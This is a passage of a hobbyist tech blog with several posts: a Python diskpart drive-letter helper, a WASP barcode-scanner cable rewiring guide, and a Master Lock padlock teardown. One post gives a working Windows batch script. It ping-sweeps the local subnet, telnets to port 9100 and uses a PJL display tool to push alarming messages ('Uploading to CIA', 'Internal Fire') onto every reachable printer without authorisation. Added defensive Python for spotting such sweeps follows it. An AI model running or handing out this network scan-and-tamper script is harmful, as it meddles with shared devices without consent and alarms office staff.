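        row["Number"] = int(row["Volume ###"].split()[1])
        volumes.append(row)
    return volumes


def build_assign_script(text, label, letter):
    """Return diskpart commands that give `label` the drive `letter`,
    or None when the letter is already correct."""
    volumes = parse_list_volume(text)
    letter = letter.upper()
    matches = [v for v in volumes if v["Label"].upper() == label.upper()]
    if len(matches) != 1:
        # zero matches: drive not plugged in; several: ambiguous label
        raise ValueError(f"expected one volume labelled {label}, found {len(matches)}")
    target = matches[0]
    if target["Ltr"].upper() == letter:
        return None
    holders = [v for v in volumes if v["Ltr"].upper() == letter]
    if holders:
        raise ValueError(f"{letter}: is already held by volume {holders[0]['Number']}")
    return f"select volume {target['Number']}\nassign letter={letter}\n"


if __name__ == "__main__":
    backup_row = SAMPLE_OUTPUT.splitlines()[5]
    print("token view :", token_letter_and_label(backup_row))
    print("column view:", parse_list_volume(SAMPLE_OUTPUT)[3]["Ltr"] or "(no letter)")
    print(build_assign_script(SAMPLE_OUTPUT, "BACKUP", "G"))
```

The returned text can be written to a file and passed to diskpart /s the same way the batch script passes assigng.txt.<br />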
<br />
That's it. It's handy. One less thing I have to do every day. Less repetitive tasks are better, that leaves more time for mayhem.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-27891885816608533782012-06-27T09:13:00.000-10:002012-06-27T09:13:55.218-10:00DIY Replace the USB cable for WASP WLS9500I'd like to take a moment and call WASP out on their complete bullshit overpriced USB cables for their barcode scanners. Specifically the WLS9500:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgTJhn00xwqv1XkCHPT3B6UmxZAkmABpXF9JU46NFeY9Cb4PsA3OtNRBHeVJUJkkstY3FsEdnz9wvul3UOKhyRZhfigl50wKxwANLh-aMsQtHw9WxCoZOA-uy0Jz3y_PB3JV3BVvb-i40/s1600/Scanner.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgTJhn00xwqv1XkCHPT3B6UmxZAkmABpXF9JU46NFeY9Cb4PsA3OtNRBHeVJUJkkstY3FsEdnz9wvul3UOKhyRZhfigl50wKxwANLh-aMsQtHw9WxCoZOA-uy0Jz3y_PB3JV3BVvb-i40/s320/Scanner.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Overly Complicated for Profit</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXN6CYhlwK6_JC6LUXe8XxJG6HND9JQHY3-niRFmmYB6L6e45BKCRKXm5g5fXOy4F1e5U1jfr9RJk920LOmPvec6d5h9fKrMZcR99icfPYYE95k_MPz_BYRGHw4B9ExGzchaR-5Tda21A/s1600/Model.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXN6CYhlwK6_JC6LUXe8XxJG6HND9JQHY3-niRFmmYB6L6e45BKCRKXm5g5fXOy4F1e5U1jfr9RJk920LOmPvec6d5h9fKrMZcR99icfPYYE95k_MPz_BYRGHw4B9ExGzchaR-5Tda21A/s1600/Model.jpg" /></a></div>
<br />
First off, the cables have about an 80% failure rate within 3-4 months, from my experience.<br />
<br />
Second the price they want for a replacement cable is ridiculous, on average around the web about $55 USD.<br />
<br />
They use a RJ-50 aka the RJ-45 10 pin adapter for the connection to the scanner. Why an RJ-50? They must be using those 10 pins for something really cool right? Surely they wouldn't do this just to charge more to their customers and make it difficult to fix yourself...<br />
<br />
When you take the plug end out of the scanner to look at the pin out you see this:<br />
<br />
1- Black<br />
2- Red<br />
3- Black<br />
4- White<br />
5- White<br />
6- Black<br />
7- Green<br />
9- White<br />
10-White<br />
<br />
When you get down to it and manage to get the actual plug end uncovered from the "protective" sleeve that they've glued and molded onto the plug, which is no small task might I add, you see that most of it is just blank pieces of plastic taking up space.<br />
<br />
Pins 4,8,9, and 10 are complete bullshit, just pieces of plastic, there's not even copper wire in them, 100% plastic. Useless, unneeded, plastic that serves no purpose.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo_d5qq7-17DzPUllvayBN_UMEwiQgNGDfFOdPuG7aS39Eb7TIhF0C0EH88jOxcjJN7cRe7OjVfWBwlmFux68MLqJTLRTaP4mfbnDtlKeTY-uqMAxvGVP1mE6SfEv3cW5iJTMWwOBmvIg/s1600/Whitejunk.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo_d5qq7-17DzPUllvayBN_UMEwiQgNGDfFOdPuG7aS39Eb7TIhF0C0EH88jOxcjJN7cRe7OjVfWBwlmFux68MLqJTLRTaP4mfbnDtlKeTY-uqMAxvGVP1mE6SfEv3cW5iJTMWwOBmvIg/s320/Whitejunk.jpg" width="276" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">White Lies</td></tr>
</tbody></table>
<br />
Pins 1 and 6 are looped together with one piece of wire in a U shape. And wouldn't you know, it doesn't work properly without 1 and 6 looped, what an amazing coincidence that you COULD make this thing with just a standard RJ45, or a RJ11 and make it easily serviceable, replaceable, and able to be done in house.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3-sR3-0iGukTDHNF3GVdYEvpWNEho6OJ-TQolKccje5cggAj60OgyWpqDDWTfL-dnnU6GzJHhf64s2m1s91WMuE6XOfjMCSd3KSJuHsQai1nsgKXbn_iaA3j1j269NifGJfM-fe-OFYM/s1600/magic.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3-sR3-0iGukTDHNF3GVdYEvpWNEho6OJ-TQolKccje5cggAj60OgyWpqDDWTfL-dnnU6GzJHhf64s2m1s91WMuE6XOfjMCSd3KSJuHsQai1nsgKXbn_iaA3j1j269NifGJfM-fe-OFYM/s320/magic.jpg" width="189" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The "Magic" Wire</td></tr>
</tbody></table>
So after you eliminate those 6 pins you're left with your regular 4 USB wires in slots 2,3,5,7.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFwR1zc2-7waY1ayFpU9b_Q3nN6FTWw6cypaSWU5t3BXB7-Ro16FVe9wCYKF8BJtpCyxrDULJA1YeaTuTL97NY43VMYaJExG-vTYbQ5XDtx5QIIy5n-75Ve002hOIEXc37qZBhyfxiJ6E/s1600/USB.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFwR1zc2-7waY1ayFpU9b_Q3nN6FTWw6cypaSWU5t3BXB7-Ro16FVe9wCYKF8BJtpCyxrDULJA1YeaTuTL97NY43VMYaJExG-vTYbQ5XDtx5QIIy5n-75Ve002hOIEXc37qZBhyfxiJ6E/s320/USB.jpg" width="255" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Awesome Splice Job</td></tr>
</tbody></table>
<br />
<br />
Actual pinout<br />
1- Black - Looped to 6<br />
2- Red - USB<br />
3- Black - USB<br />
4- Useless<br />
5- White - USB<br />
6- Black - Looped to 1<br />
7- Green - USB<br />
8- Useless<br />
9- Useless<br />
10- Useless<br />
<br />
Ordered the equipment online, crimper ~$40, ends .99 / each. If you have a small fleet of these things to take care of, like I do, I suggest you make the investment also and tell WASP to get bent.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-39640375446503080202012-06-22T05:43:00.000-10:002012-06-22T05:43:17.750-10:00Fun with HP PrintersThere are few things in life that are as entertaining as the confusion and chaos that ensue when you make minor changes to the environment/daily routine of people that do office work.<br />
<br />
Something as simple as changing the display on a network printer will immediately cause one of two reactions: total and complete mental shutdown, or complete denial of acceptance into their reality (aka they ignore it).<br />
<br />
Once upon a time one of the l0pht team made a small utility called the HP Display Hack, sili circa 12/8/97 according to the usage output. This allows you to change the standard message on HP printer displays. There are several other utilities you can do this with, such as HiJetter by Phenoelit. Also you can just telnet/putty in on 9100 and issue @PJL RDYMSG DISPLAY="BlahBlah".<br />
<br />
So anyways, I wrote a script to find your local network, scan 1-254 and find anything that responds to ping, then check if it will establish a telnet connection on port 9100, if so use the HP Display Hack program to randomly change the message to 1 of the 10 options (change if you like, up to 16 characters).<br />
<br />
Not particularly evil, but always good for a laugh, especially when the help desk gets a call about the printer in the accounting office stating it's uploading documents to the CIA. Or the internal printer fire in the warehouse.<br />
<br />
-=Script=-<br />
<br />
@echo off<br />setlocal enabledelayedexpansion<br />::find network<br />for /f "tokens=2 delims=:" %%i in ('ipconfig ^| find /i "Ip Address"') do set network=%%i<br />for /f "tokens=1,2,3 delims=." %%i in ("%network%") do set network2=%%i.%%j.%%k<br />::Scan for Active Hosts<br />for /L %%i in (1,1,254) do ping -n 1 -w 60 %network2%.%%i | find /i "reply" >> ~temp1<br />for /f "tokens=3 delims=: " %%i in (~temp1) do echo %%i >> ~temp2<br />del /f /q ~temp1 > nul<br />::Check for port 9100 (aka printers)<br />for /f %%i in (~temp2) do (<br /> set t=!random!<br /> set r=!t:~1,1!<br /> if !r! == 1 set message="[READY] TO ROCK"<br /> if !r! == 2 set message="Uploading to CIA"<br /> if !r! == 3 set message="FEED ME A KITTEN"<br /> if !r! == 4 set message="Spelling Error"<br /> if !r! == 5 set message="Internal Fire"<br /> if !r! == 6 set message="OUT OF LETTERS"<br /> if !r! == 7 set message="Self Destruct:ON"<br /> if !r! == 8 set message="PCLOAD LETTER"<br /> if !r! == 9 set message="POWER FLUID LOW"<br /> if !r! == 0 set message="Insert Coin"<br /> set r=<br /> set t=<br /> start /min telnet %%i 9100<br /> ping -n 5 127.0.0.1 > nul<br /> netstat -n | find /i "%%i:9100" | find /i "Established" && hpnt.exe %%i "!message!" <br /> taskkill /f /IM telnet.exe<br />)<br />del /f /q ~temp2 > nul<br />exit<br />
<br />
<br />
As stated previously hpnt just issues the @PJL RDYMSG Display="whatever" command over telnet. It could be done with a piped text file to netcat also as there's no way I know of to send commands to a telnet session in pure batch.<br />
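From the defender's side, the behaviour described above shows up as one workstation opening TCP 9100 to many printers in a short time. This added example (not part of the original post) flags that pattern in flow records; the log format, addresses, thresholds and function names are assumptions, and the sample records are constructed.<br />

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

RAW_PRINT_PORT = 9100  # raw printing port that accepts PJL commands

# Constructed flow records (timestamp src dst proto dport), sorted by time.
SAMPLE_LOG = """\
# 10.0.5.10 is the print server, 10.0.5.40-45 are printers
2024-01-15T09:00:01 10.0.5.10 10.0.5.40 tcp 9100
2024-01-15T09:00:02 10.0.5.10 10.0.5.41 tcp 9100
2024-01-15T09:00:03 10.0.5.10 10.0.5.42 tcp 9100
2024-01-15T09:00:04 10.0.5.10 10.0.5.43 tcp 9100
2024-01-15T09:00:05 10.0.5.10 10.0.5.44 tcp 9100
2024-01-15T09:05:00 10.0.5.88 10.0.5.40 tcp 9100
2024-01-15T09:10:10 10.0.5.77 10.0.5.40 tcp 9100
2024-01-15T09:10:40 10.0.5.77 10.0.5.40 tcp 9100
2024-01-15T09:12:00 10.0.5.23 10.0.5.40 tcp 9100
2024-01-15T09:12:06 10.0.5.23 10.0.5.41 tcp 9100
2024-01-15T09:12:12 10.0.5.23 10.0.5.42 tcp 9100
2024-01-15T09:12:18 10.0.5.23 10.0.5.43 tcp 9100
2024-01-15T09:12:24 10.0.5.23 10.0.5.44 tcp 9100
2024-01-15T09:12:30 10.0.5.23 10.0.5.45 tcp 9100
2024-01-15T09:12:31 10.0.5.23 10.0.5.10 tcp 443
2024-01-15T09:25:00 10.0.5.88 10.0.5.41 tcp 9100
2024-01-15T09:45:00 10.0.5.88 10.0.5.42 tcp 9100
2024-01-15T10:05:00 10.0.5.88 10.0.5.43 tcp 9100
2024-01-15T10:25:00 10.0.5.88 10.0.5.44 tcp 9100
"""


def parse_record(line):
    """Parse one record of the assumed five-field format."""
    ts, src, dst, proto, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, proto.lower(), int(dport)


def find_9100_sweeps(lines, window=timedelta(minutes=5), min_targets=5,
                     print_servers=()):
    """Report sources that reach `min_targets` or more distinct hosts on
    TCP 9100 within `window`. Known print servers are skipped."""
    recent = defaultdict(deque)  # src -> (timestamp, dst) pairs inside the window
    alerts = {}
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        ts, src, dst, proto, dport = parse_record(line)
        if proto != "tcp" or dport != RAW_PRINT_PORT or src in print_servers:
            continue
        seen = recent[src]
        seen.append((ts, dst))
        # Drop connections that have aged out of the sliding window.
        while ts - seen[0][0] > window:
            seen.popleft()
        targets = {d for _, d in seen}
        if len(targets) >= min_targets:
            best = alerts.get(src)
            if best is None or len(targets) > len(best["targets"]):
                alerts[src] = {
                    "src": src,
                    "first_seen": seen[0][0],
                    "last_seen": ts,
                    "targets": sorted(targets),
                }
    return sorted(alerts.values(), key=lambda a: a["src"])


if __name__ == "__main__":
    for alert in find_9100_sweeps(SAMPLE_LOG.splitlines(),
                                  print_servers={"10.0.5.10"}):
        print(f"{alert['src']} reached {len(alert['targets'])} hosts on "
              f"tcp/9100 between {alert['first_seen']} and {alert['last_seen']}")
```

Restricting port 9100 on the printers to the print server's address turns every other source seen here into a dropped connection rather than a changed display.<br />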
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-44957552031948838132012-06-21T06:10:00.002-10:002012-06-26T05:28:45.026-10:00Master Lock Warded Padlock Teardown<br />
<div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib7F99V-PtkeGVtAaxL55tjzi5g8IxuxQvpWOaJBhK4XM0KZr4bAPn673oO-uB39pTOdrCjWAU-OOWZF9m04F5JnIkQch2rL9JMPa57miftk0ytgAlT41yBvxWRSkpwD1VdzsGaUjTrhU/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj87BpR5XKtivuhOBXF7P9NvRRgTOWC3UdAmH8N5FPRbzZCf6ZxWACY35XuaVWTEBNeVRMNYAjKS5OfPdsp_SU3eU3qwfCztgFGiWdIHApvp2FWgmcSovKFyFmiRzGNjFQO6_DX4A7yxDM/s1600/2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj87BpR5XKtivuhOBXF7P9NvRRgTOWC3UdAmH8N5FPRbzZCf6ZxWACY35XuaVWTEBNeVRMNYAjKS5OfPdsp_SU3eU3qwfCztgFGiWdIHApvp2FWgmcSovKFyFmiRzGNjFQO6_DX4A7yxDM/s200/2.jpg" width="120" /></a><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib7F99V-PtkeGVtAaxL55tjzi5g8IxuxQvpWOaJBhK4XM0KZr4bAPn673oO-uB39pTOdrCjWAU-OOWZF9m04F5JnIkQch2rL9JMPa57miftk0ytgAlT41yBvxWRSkpwD1VdzsGaUjTrhU/s200/1.jpg" width="186" /></div>
This is the Master Lock Warded padlock. Not a particularly impressive lock, but I've never taken one apart before. So I took one apart.<br />
I removed the heads off the bottom posts that hold all the metal plates together.<br />
All I had was a hand file. It took a while, but I finally got the bottom plate off.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGCPWvizeLN31fwzoaCLE4l0pm1nB3fiPt4GhCOVX9QXrsXvL-m9n8TuNourbxAJWxa3mkCTArL70VjyzbURX89eMl3HLssREbptniie47zmRZxE3m3sE6i_iHNGcfd97eGU14TMa71NQ/s1600/3-2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGCPWvizeLN31fwzoaCLE4l0pm1nB3fiPt4GhCOVX9QXrsXvL-m9n8TuNourbxAJWxa3mkCTArL70VjyzbURX89eMl3HLssREbptniie47zmRZxE3m3sE6i_iHNGcfd97eGU14TMa71NQ/s320/3-2.jpg" width="131" /></a><br />
<br />
<br />
<br />
Here we have the bottom plate (what's left of it), the keyway circle, and the shackle spring. The keyway circle sits loose, trapped between the bottom and second plates of the lock.<br />
<br />
<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYFoYfUC2EcJBeVx_krPyPiMJnY32EMaT20Z3SjbaSOCdcedEyxLZvGfiJZM4GnowPm-Yu53tp5eeZodM9PT_JfIob56fmFa3zAqtNlXZskJVR3re2xU3lj7AgOD9U25wPGVS9yo-TuOY/s1600/3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYFoYfUC2EcJBeVx_krPyPiMJnY32EMaT20Z3SjbaSOCdcedEyxLZvGfiJZM4GnowPm-Yu53tp5eeZodM9PT_JfIob56fmFa3zAqtNlXZskJVR3re2xU3lj7AgOD9U25wPGVS9yo-TuOY/s200/3.jpg" width="200" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Here we have the lock, from the bottom, with the bottom plate off. The spring goes into a hollowed out portion on the shackle and is what makes it pop up when the locking mechanisms are released by the key.<br />
<br />
<br />
<br />
After getting the bottom plate off, the rest came off relatively easily. They didn't exactly just all fall off like I had hoped, but I managed to get them off with just a small chisel to separate the plate, then a flathead screwdriver to move them up and off the posts.<br />
Here's a picture of the lock half disassembled.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg19cFvitJ1QCVUVHBrzm_a6PEEtXQot9nxehmXv2eLtINLpmTAX0AU-y_WFnIbv1gNgd5F9V1JkvV9XzpCbJq8qZBSqUpQl2WA70K93k4GLTh9TwVYWl9UkY8hk6UUkCcITYse36IS1YE/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg19cFvitJ1QCVUVHBrzm_a6PEEtXQot9nxehmXv2eLtINLpmTAX0AU-y_WFnIbv1gNgd5F9V1JkvV9XzpCbJq8qZBSqUpQl2WA70K93k4GLTh9TwVYWl9UkY8hk6UUkCcITYse36IS1YE/s320/4.jpg" width="320" /></a></div>
<br />
Here are the plates that have been removed, bottom on the left, moving up to the right.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilIOULSQMao-AC00YGZlTYRVenbsiLgRCmq90BbaRhDSTvxhkbl15fVEWAZE7vwGAj2UyClT1CihEhyQQXqkd2abOTpdiPDfSn16gXAGiJ_AvL6c_Hh6-uZl1jOCMQgweDoSld62dtmLU/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilIOULSQMao-AC00YGZlTYRVenbsiLgRCmq90BbaRhDSTvxhkbl15fVEWAZE7vwGAj2UyClT1CihEhyQQXqkd2abOTpdiPDfSn16gXAGiJ_AvL6c_Hh6-uZl1jOCMQgweDoSld62dtmLU/s640/5.jpg" width="640" /></a></div>
<br />
The second to last plate latches into a groove on the bottom of the shackle and prevents it from falling out when opened. Notice the groove on the shackle below. This is also the longer side of the shackle that is drilled out to accept the spring.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOQ7gYAlJ64q1cGZrFttEODrahbF58oiNKosR3_1DGImdakAdEDy08U-B3e53bSONLhT4Au-U4KaMM332DkKIwsb2ckQJi7vLTxQzxvidc3jh2BPcId9s02WnmsWOGlER_9HM76BACuew/s1600/shackle.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOQ7gYAlJ64q1cGZrFttEODrahbF58oiNKosR3_1DGImdakAdEDy08U-B3e53bSONLhT4Au-U4KaMM332DkKIwsb2ckQJi7vLTxQzxvidc3jh2BPcId9s02WnmsWOGlER_9HM76BACuew/s400/shackle.jpg" width="211" /></a></div>
<br />
Next we come to the lower release for the shackle. This is one of two individual locking mechanisms.<br />
The wire sits in a groove on the shackle. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpfSTLiRYDZ0kSVL5_cyFa-gaRp2m7aSd7Ul4QjLJOHBJ4PIpZCbjEhS86EjdK5CwNzu6v7R9jxx17sxRCRxnr7ui6N7kFT8ZcqN4xUPYPGdAax-f4l3Mdf5HUyWrXXsGhoxjmX7oFyY/s1600/Locking+Spring+-+1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpfSTLiRYDZ0kSVL5_cyFa-gaRp2m7aSd7Ul4QjLJOHBJ4PIpZCbjEhS86EjdK5CwNzu6v7R9jxx17sxRCRxnr7ui6N7kFT8ZcqN4xUPYPGdAax-f4l3Mdf5HUyWrXXsGhoxjmX7oFyY/s320/Locking+Spring+-+1.jpg" width="320" /></a></div>
When the key is inserted and turned it moves the wire out of the way. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif73vhzdlrNFDfHWi0LrYZj7jK-347YbVjRYImgm_PB9-3o8qvqpxabgaKYv9IeC5xDYdZz-ojY2vBZgcFt3-mRLIUBpgHrC0gYSdiP7NiVTjX8WbmuaUFBRxSAzH0BIRjXYfTfwJZooY/s1600/Locking+Spring+-+3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif73vhzdlrNFDfHWi0LrYZj7jK-347YbVjRYImgm_PB9-3o8qvqpxabgaKYv9IeC5xDYdZz-ojY2vBZgcFt3-mRLIUBpgHrC0gYSdiP7NiVTjX8WbmuaUFBRxSAzH0BIRjXYfTfwJZooY/s320/Locking+Spring+-+3.jpg" width="320" /></a></div>
<br />
The middle groove on the shackle is where the locking wire sits. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn2ahiIXuuksjRjLCcIf8ofm90QJViUSDEq6iHscJ-p36pbBDF4AIQlmKIoCA-93jMVfhTeOgWO-iOmTancHRgTBgqwiCNZBY4qgsSmA0VsF-RDC421rJHmmMpHhEU-FeJPjzR4Nl_azE/s1600/Shackle3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn2ahiIXuuksjRjLCcIf8ofm90QJViUSDEq6iHscJ-p36pbBDF4AIQlmKIoCA-93jMVfhTeOgWO-iOmTancHRgTBgqwiCNZBY4qgsSmA0VsF-RDC421rJHmmMpHhEU-FeJPjzR4Nl_azE/s320/Shackle3.jpg" width="224" /></a></div>
<br />
Here is just the plate with the wire. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihUxKMlmYcLF2svedw7TZdiFv9n5lt5aop7Snw_dXFPCw0AQKITnfT1mEc-VJRdnQaSMiPhZmR0Qc7rORYwzank41-qWjY6_bUw-VP-5IAa0oHcbVQYjPW4J6vcDbyck3alkfnUtGEqxU/s1600/Locking+Spring+-+Plate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihUxKMlmYcLF2svedw7TZdiFv9n5lt5aop7Snw_dXFPCw0AQKITnfT1mEc-VJRdnQaSMiPhZmR0Qc7rORYwzank41-qWjY6_bUw-VP-5IAa0oHcbVQYjPW4J6vcDbyck3alkfnUtGEqxU/s320/Locking+Spring+-+Plate.jpg" width="320" /></a></div>
<br />
Next is the upper locking mechanism. It is also a spring-like release. When the key is inserted and turned, it pushes the two sides apart, removing it from the upper grooves on the shackle. (See the previous shackle picture: the top groove is where this sits. It is a double-sided groove.)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj62OC9XP2qb3MR1VYJZ3k9Ge90nfai6RQSLIMbY-Vbpke9jaEjDWvQdsDHxrny-jK9IcCu2sF1Vn_lppdkG3SHx6ZbFnLyaqfL2L4EGhMeNYweaRahdQ00YOMS_v5QPoYyLMA-pqU50fs/s1600/Locking+Clasp+-+2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj62OC9XP2qb3MR1VYJZ3k9Ge90nfai6RQSLIMbY-Vbpke9jaEjDWvQdsDHxrny-jK9IcCu2sF1Vn_lppdkG3SHx6ZbFnLyaqfL2L4EGhMeNYweaRahdQ00YOMS_v5QPoYyLMA-pqU50fs/s320/Locking+Clasp+-+2.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh70NRZLuyvIcTM8jvS0oEXj5-jVJ_Yk312ixuC6HVPtNZs5WjJHQt9mpBX84zoSIxEOQssi32cNUxV39U9lL04i_p7uHShfHkaOZ2Bhz5bSMkvAffjw2K4gFsdI7eU6XntqGYG0AdG05Y/s1600/Locking+Clasp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh70NRZLuyvIcTM8jvS0oEXj5-jVJ_Yk312ixuC6HVPtNZs5WjJHQt9mpBX84zoSIxEOQssi32cNUxV39U9lL04i_p7uHShfHkaOZ2Bhz5bSMkvAffjw2K4gFsdI7eU6XntqGYG0AdG05Y/s320/Locking+Clasp.jpg" width="320" /></a></div>
<br />
This is a series of pictures of the plates from top to bottom as you take the lock apart. Some identical plates in series were not photographed, as they added no value to the content.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtJqg0Oh6RqD_GxAzksgoj6yu2j7p-Nv3gdd8058YI2o2op7IqPt9GOkcoXfI1lGbgsAWSJY4cRNOg374Y1XnTzn5gKMCuRQXIdIKcpRrnMNjuhUe0uQBCIqLgOod-APJcYflhz9KDqY/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtJqg0Oh6RqD_GxAzksgoj6yu2j7p-Nv3gdd8058YI2o2op7IqPt9GOkcoXfI1lGbgsAWSJY4cRNOg374Y1XnTzn5gKMCuRQXIdIKcpRrnMNjuhUe0uQBCIqLgOod-APJcYflhz9KDqY/s320/1.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9VeNmdPxaO2lwlr7OichiUY35SsI9bYLoggJPFXZfIbxOEIIxApfdrxsCuwyfP37AfEtBY0v3n1xQ0T6oEHDsxnv-vbvS0D8X0ViYyWDegn_OU4y4RXvvxjkOxfe_wCZftJt7GD55U4/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9VeNmdPxaO2lwlr7OichiUY35SsI9bYLoggJPFXZfIbxOEIIxApfdrxsCuwyfP37AfEtBY0v3n1xQ0T6oEHDsxnv-vbvS0D8X0ViYyWDegn_OU4y4RXvvxjkOxfe_wCZftJt7GD55U4/s320/2.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
